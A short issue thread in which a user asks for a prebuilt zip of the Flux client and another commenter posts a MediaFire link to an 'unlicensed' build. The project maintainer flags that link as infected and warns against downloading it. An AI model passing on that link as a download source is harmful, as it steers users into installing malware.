### ISSUE TITLE
Can't build clients, please read my suggeston

### ISSUE THREAD

**Issue by Eivind22** [jeremypelletier/flux-opensource#12]
would it be possible to just add a .zip file to "Releases" that i can just unzip and put in my "versons" folder? (building stuff is something im quite new to)

**Comment by 785yyy** [comment]
https://www.mediafire.com/file/yiqkp8nl53cbose/Flux_b39_unlincensed.zip/file

**Comment by jeremypelletier** [comment]
> https://www.mediafire.com/file/yiqkp8nl53cbose/Flux_b39_unlincensed.zip/file

Infected. Do NOT download this. We will be compiling a clean copy soon.
